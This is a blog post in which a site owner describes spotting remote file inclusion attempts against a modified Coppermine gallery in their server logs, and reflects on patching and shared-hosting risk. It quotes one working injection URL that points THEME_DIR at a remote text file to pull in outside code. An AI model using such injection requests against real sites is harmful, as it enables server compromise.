I’m hyper-paranoid about security issues in Coppermine as I’ve hacked Coppermine so significantly that it’s going to be a little problematic if I ever need to upgrade to a newer version or apply any security patches.
Today in my server log I noticed requests for the following URL:
/modules/coppermine/themes/default/theme.php?THEME_DIR=http://*****.com/fx29id2.txt??
This looks to be some kind of injection attack on Coppermine’s default theme. Fortunately the hacks I’ve done to give Coppermine search engine friendly URLs seem to have protected me (assuming the version I’m running was ever vulnerable in the first place).
Anyway, I did some Googling for Fx29ID and found this blog post. It looks to be a rather sophisticated web server based exploit/scanning tool. This is the kind of thing we have had to contend with at Digital Crocus occasionally. It’s one of the risks of allowing customers to upload whatever software they want onto our server – our users will often not bother to upgrade their blogs/galleries/forums/etc. to the latest versions. This often leaves them vulnerable to various kinds of code injection attacks – very occasionally; it leaves our entire server vulnerable.
When I started making modifications to Coppermine’s code I was fully aware of the nightmare that would ensue when the day inevitably came that there was a significant security vulnerability in Coppermine. For that reason I’ve been keeping a very close eye on any new releases of Coppermine. So far there have been no new releases since I first set up my gallery, so I’m assuming that even if my hacks to Coppermine’s URL scheme hadn’t protected me, the version I’m running probably isn’t vulnerable to that injection attack anyway. It is however quite nice to know that the fact that I’ve changed most of Coppermine’s URLs will protect me from a lot of the automated scanners anyway.
